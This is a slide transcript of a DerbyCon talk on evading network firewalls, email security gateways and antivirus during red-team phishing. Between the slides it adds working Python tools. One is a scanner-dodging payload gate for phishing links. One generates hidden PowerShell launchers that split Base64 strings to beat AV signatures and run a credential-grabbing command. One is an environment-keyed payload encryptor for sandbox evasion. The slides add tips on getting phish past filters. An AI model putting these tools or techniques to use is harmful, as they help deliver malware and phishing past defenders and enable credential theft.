
Modern Evasion Techniques

DerbyCon 7.0
@curi0usJack


  1. Modern Evasion Techniques, a.k.a. How to Concatenate Strings. Jason Lang - @curi0usJack
  2. Topics
     • Inline Control Workarounds: Palo Alto, Fortinet, Cisco
     • NG Email Controls: Proofpoint, Mimecast
     • Anti-Virus Evasion: most of them
     • Payload Customization: PowerShell, Macros, CSharp
  3. Thank you: @Bandrel, @jarsnah12, @slobtresix0, @midnite_runr, msf/empire devs
  4. About Jason Lang (@curi0usJack) • 10+ years full-time InfoSec • Sr Consultant @ TrustedSec • Specialties: Active Directory, Development (C#, Python, PowerShell) • Hobbies: Woodworking, Beekeeping, Fly Fishing
  5. PAUSE
  6. blue harder
  7. Inline Controls • Defined: a network-layer control that performs real-time threat prevention • Two biggest contenders: Palo Alto, Fortinet • My testing was performed with a fully licensed, up-to-date Palo Alto, as well as a Cisco 5500 with FirePower
  8. Test Cases
     • Meterpreter (stock): windows/x64/meterpreter/reverse_https, default certificate, port 443
     • Empire: Empire 2.1, default certificate, standard stager, port 443
     • Pupy: obfs3 transport, defaults, port 443
     • Custom Meterpreter: custom C# code, whatever I wanted
     Victim machines: Windows 7/10 x64, Windows Defender
  9. Cisco Configuration • Rules: blocking all the things • SSL Decryption: ON
  10. Cisco Configuration: https://www.cisco.com/c/en/us/td/docs/security/firepower/60/configuration/guide/fpmc-config-guide-v60/Access_Control_Using_Intrusion_and_File_Policies.html
  11. Cisco Configuration: MAX DETECTION MODE
  12. PA Configuration • Vuln Protection: all the things set to reset_both • Wildfire: ON • SSL Decryption
  13. Meterpreter Results • With SSL Decryption • Session Opened/Closed • Without SSL Decryption • Results were the same for the Custom C# Meterpreter.
  14. Pupy Results • With SSL Decryption • Without SSL Decryption • Win10 Defender (screenshot)
  15. Empire Lulz: a story in screenshots
  16. Empire Lulz: after running our launcher…
  17. Empire Lulz
  18. Empire Lulz: Nah… this shouldn’t work… there’s no way… A minor server change:
  19. Empire Lulz
  20. Inline Evasions • If you must use msf, use auxiliary/gather/impersonate_ssl
  21. Inline Evasions
  22. Inline Evasions
  23. Inline Evasions • Pay attention to decryption/detection patterns. • Favor Empire/Pupy over MSF if you are getting detected. Change all defaults. • Change your template.** • Hope you’re working with a Cisco firewall. ** https://www.blackhillsinfosec.com/modifying-metasploit-x64-template-for-av-evasion/
  24. Email Controls • Defined: anything that stops my phish from getting to the inbox • Examples: Proofpoint, Mimecast, Google spam filters
  25. Email Controls: Thanks to @CaseyCammilleri for all the shells!
  26. Email Controls
  27. Email Controls
  28. Email Controls
  29. Email Controls: Apache mod_rewrite to the rescue!
  30. Email Controls: add to /etc/apache2/sites-enabled/000-default.conf
  31. Email Controls: create /var/www/html/.htaccess. Moar awesome redteam infrastructure guidance here: https://bluescreenofjeff.com/
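The slides show the mod_rewrite rules only as screenshots. The block below is an added example, not the talk's configuration: it is a small Python gate that makes the same decision mod_rewrite would (send the payload only to the target network and only to browser-looking clients, bounce everything else to a decoy), so the conditions can be tested offline before they are committed to Apache. The target range, the User-Agent pattern, the payload path and the decoy URL are constructed assumptions, and the Apache lines in the comment are my own translation of the same logic.

```python
"""Request gate mirroring the mod_rewrite pattern used to keep email
security scanners away from a phishing payload. Added example, not code
from the talk; rule values are constructed."""
import ipaddress
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Tuple

# Constructed rule set (assumptions): only the target network gets the
# payload; any other source, or any client whose User-Agent looks like an
# automated fetcher, is redirected to a harmless page instead.
TARGET_NETS = [ipaddress.ip_network("203.0.113.0/24")]  # RFC 5737 test range
SCANNER_UA = re.compile(r"(curl|wget|python-requests|go-http-client|bot|scanner)", re.I)
PAYLOAD_PATH = "/invoice.doc"
DECOY_URL = "https://example.com/"

# Equivalent Apache rules for 000-default.conf or .htaccess (my translation,
# mod_rewrite enabled). Conditions 2 and 3 are OR'ed, then AND'ed with 1:
#   RewriteEngine On
#   RewriteCond %{REQUEST_URI} ^/invoice\.doc$
#   RewriteCond %{HTTP_USER_AGENT} (curl|wget|python-requests|go-http-client|bot|scanner) [NC,OR]
#   RewriteCond %{REMOTE_ADDR} !^203\.0\.113\.
#   RewriteRule ^ https://example.com/ [R=302,L]


def route(path: str, remote_addr: str, user_agent: str) -> Tuple[str, str]:
    """Return ("serve", path) or ("redirect", url) for one request."""
    if path != PAYLOAD_PATH:
        return ("serve", path)            # only the payload path is gated
    try:
        addr = ipaddress.ip_address(remote_addr)
    except ValueError:
        return ("redirect", DECOY_URL)    # unparsable source: fail closed
    if SCANNER_UA.search(user_agent or ""):
        return ("redirect", DECOY_URL)    # scanner-looking client
    if not any(addr in net for net in TARGET_NETS):
        return ("redirect", DECOY_URL)    # not coming from the target
    return ("serve", path)


class GateHandler(BaseHTTPRequestHandler):
    """Tiny server so the gate can be exercised with a real browser/curl."""

    def do_GET(self):
        action, target = route(self.path, self.client_address[0],
                               self.headers.get("User-Agent", ""))
        if action == "redirect":
            self.send_response(302)
            self.send_header("Location", target)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"payload placeholder\n")  # real deployment serves the file


if __name__ == "__main__":
    # Example: curl -A "python-requests/2.18" -i http://127.0.0.1:8080/invoice.doc -> 302
    HTTPServer(("127.0.0.1", 8080), GateHandler).serve_forever()
```

The User-Agent list is deliberately short; in practice you populate it from what you observe the email gateway fetching your links with, and you log every redirected request so you learn which scanner touched the link and when.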
  32. Email Controls
  33. Email Controls: Thanks for the tip @slobtresix0!
  34. Email Controls
  35. haha AV https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10
  36. Email Controls: Shell from JOHNNYSPC (Wildfire)
  37. Email Controls
  38. Email Controls
  39. Email Controls
  40. Email Controls
  41. Email Controls
  42. Email Controls
  43. Email Controls Q: What if Google is blocking on the recipient’s side?
  44. Email Controls A: You forgot this: the correct SPF record for sending via O365 (Microsoft’s documented record is v=spf1 include:spf.protection.outlook.com -all)
  45. Email Workarounds
      1. Obfuscate your payload (generally the most basic will do)
      2. Set SPF/DKIM records
      3. Use links instead of attachments
      4. mod_rewrite is your friend
      5. Check the phish with isnotspam.com
      6. Don’t trip threshold alerts. Send targeted phish slowly.
  46. Anti-Virus
  47. Anti-Virus • First things first: understand current state • Test payloads against VirusTotal • Focused on the major players: Symantec, McAfee, Trend, Windows Defender, Cylance
  48. Anti-Virus: VirusTotal detections by payload type
      Type           Template   Args/Notes            Detections   Major player detection
      Binary (x86)   No         None                  51/64        Yes
      Binary (x64)   No         None                  41/64        Yes
      Binary (x64)   Yes        None                  16/62        Yes
      Binary (x64)   Yes        Custom C#             6/64         Yes (MS)
      Binary (x64)   Yes        C#, -e xor -i 4       3/64         Yes (MS)
      Binary (x64)   Yes        C#, -e zutto_dekiru   2/64         No
      PowerShell     No         Unicorn               1/56         No
      Binary (x64)   Yes        Ebowla                0/64         No
  49. AV Evasion #1 - Custom C# (1) • Receives msfvenom -f csharp output • Easily modified to suit needs • Basic exe detection: 6/64
  50. AV Evasion #1 - Custom C# (2) • Runs PowerShell code without powershell.exe
  51. Demo: C# Payload Generation
  52. AV Evasion #1 - Custom C# (2)
  53. AV Evasion #2 - PowerShell • AV vendors are simply searching for strings • Remove all comments • Change function names / param names • Concatenate your encoded commands
  54. AV Evasion #2 - PowerShell: powershell -W 1 -c ". .\Invoke-Minicars.ps1; Invoke-Minicars -GimmeCreds" (-W 1 is -WindowStyle Hidden) https://gist.github.com/curi0usJack/adbf34bd402f28138388bd6e266da961
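The "concatenate your encoded commands" point from slide 53, as an added example that is not the gist linked above: a generator that Base64-encodes a PowerShell command the way -EncodedCommand expects (UTF-16LE), splits the encoding into randomly sized single-quoted pieces joined with +, and emits a one-liner that rebuilds and runs it. A decoder is included so you can confirm, from the blue side as much as the red, what a launcher built this way actually executes. Chunk sizes, the variable name and the seed are constructed assumptions; the sample command is the one on the slide.

```python
"""Generate a PowerShell launcher whose Base64 payload is split into
concatenated string literals, and recover the command from such a
launcher. Added example; chunk sizes and variable name are constructed."""
import base64
import random
import re


def encode_ps(command: str) -> str:
    """Base64 of UTF-16LE text, the format powershell -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def split_concat(b64: str, min_len: int = 4, max_len: int = 9, seed: int = 7) -> str:
    """Return a PowerShell expression ('ab'+'cd'+...) that rebuilds b64.
    Random chunk lengths mean no two launchers share a long literal, so a
    signature on any fixed substring of the encoding will not match."""
    rng = random.Random(seed)  # seeded so results are reproducible in tests
    parts, i = [], 0
    while i < len(b64):
        n = rng.randint(min_len, max_len)
        parts.append("'" + b64[i:i + n] + "'")
        i += n
    return "(" + "+".join(parts) + ")"


def build_launcher(command: str, var: str = "$q", seed: int = 7) -> str:
    """Full one-liner: join the pieces, decode back to UTF-16LE text and pass
    it to Invoke-Expression. -W 1 is -WindowStyle Hidden, as on the slide."""
    expr = split_concat(encode_ps(command), seed=seed)
    body = (f"{var}={expr};"
            f"IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({var})))")
    return f'powershell -W 1 -c "{body}"'


def recover_command(launcher: str) -> str:
    """Analyst side: pull the quoted pieces out of the launcher, join them and
    decode, to see what the launcher would run without executing it."""
    m = re.search(r"=\((.*?)\);IEX", launcher)
    if not m:
        raise ValueError("no concatenated literal found")
    pieces = re.findall(r"'([^']*)'", m.group(1))
    return base64.b64decode("".join(pieces)).decode("utf-16-le")


if __name__ == "__main__":
    cmd = ". .\\Invoke-Minicars.ps1; Invoke-Minicars -GimmeCreds"  # command from the slide
    launcher = build_launcher(cmd)
    print(launcher)
    print(recover_command(launcher) == cmd)
```

Splitting only buys time against string signatures; the decode-and-IEX tail of the launcher is itself a recognisable string, which is why the slide's other two bullets (rename everything, strip comments) matter as much as the concatenation.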
  55. AV Evasion #3 - Ebowla • Encrypts payload with a target environment variable • Self-decrypts on execution • Basic exe detection: 0/64 • https://github.com/Genetic-Malware/Ebowla
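The environmental-keying idea behind Ebowla, as an added example that is not Ebowla's code: the payload is encrypted under a key derived from a value only the target has (an environment variable), so the artifact on disk decrypts to the real payload on the target and to nothing usable in a sandbox or on an analyst's box. Ebowla uses AES; this stand-in uses a SHA-256 counter-mode keystream with PBKDF2 key derivation and an HMAC tag so it runs with only the standard library, and it handles the failure mode the talk relies on: a wrong environment yields None rather than garbage being executed. The variable name, its value and the payload bytes are constructed.

```python
"""Environmental keying in the style of Ebowla. Added example, not the
project's code: SHA-256 counter-mode keystream instead of AES, PBKDF2 key
derivation, HMAC tag to detect a wrong-host decrypt. Sample values constructed."""
import hashlib
import hmac
import os
from typing import Optional


def derive_key(env_name: str, env_value: str, salt: bytes) -> bytes:
    """Key from the target-specific value; PBKDF2 slows offline guessing of short values."""
    return hashlib.pbkdf2_hmac("sha256", f"{env_name}={env_value}".encode(), salt, 100_000)


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Deterministic keystream: SHA-256(key || nonce || counter) blocks."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def seal(payload: bytes, env_name: str, env_value: str) -> dict:
    """Builder side: produce the blob that ships inside the loader. Only the
    variable NAME is stored; the value never leaves the build box."""
    salt, nonce = os.urandom(16), os.urandom(16)
    key = derive_key(env_name, env_value, salt)
    ct = bytes(p ^ k for p, k in zip(payload, keystream(key, nonce, len(payload))))
    tag = hmac.new(key, nonce + ct, "sha256").digest()
    return {"env": env_name, "salt": salt, "nonce": nonce, "ct": ct, "tag": tag}


def unseal(blob: dict, environ: dict) -> Optional[bytes]:
    """Loader side: derive the key from the live environment and return the
    payload only if the tag verifies; None means wrong host (or a sandbox)."""
    value = environ.get(blob["env"])
    if value is None:
        return None
    key = derive_key(blob["env"], value, blob["salt"])
    expected = hmac.new(key, blob["nonce"] + blob["ct"], "sha256").digest()
    if not hmac.compare_digest(blob["tag"], expected):
        return None
    return bytes(c ^ k for c, k in zip(blob["ct"], keystream(key, blob["nonce"], len(blob["ct"]))))


if __name__ == "__main__":
    payload = b"\xfc\x48\x83\xe4\xf0"  # constructed stand-in for msfvenom output
    blob = seal(payload, "USERDNSDOMAIN", "CORP.EXAMPLE")
    print(unseal(blob, {"USERDNSDOMAIN": "CORP.EXAMPLE"}) == payload)  # on target
    print(unseal(blob, {"USERDNSDOMAIN": "SANDBOX.LOCAL"}))            # elsewhere
    print(unseal(blob, dict(os.environ)))                              # this machine
```

The tag lets the loader fail cleanly, but it also gives an analyst an oracle to test guesses of the keying value offline, which is why the value should be something with real entropy for the target (domain plus hostname plus username together, say) rather than a variable whose value is easy to enumerate.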
  56. Demo: Chaining it together: Payload Gen -> Evasion -> Delivery Vehicle
  57. Tools
      1. MSF/Empire - you should know where these are at. =)
      2. Pupy - https://github.com/n1nj4sec/pupy
      3. Unicorn - https://github.com/trustedsec/unicorn
      4. Ebowla - https://github.com/Genetic-Malware/Ebowla
      5. Luckystrike - https://github.com/curi0usJack/luckystrike
      6. C# Demo Extras
         1. https://github.com/curi0usJack/psfire
         2. https://github.com/curi0usJack/custompayload
  58. Thank you! =)
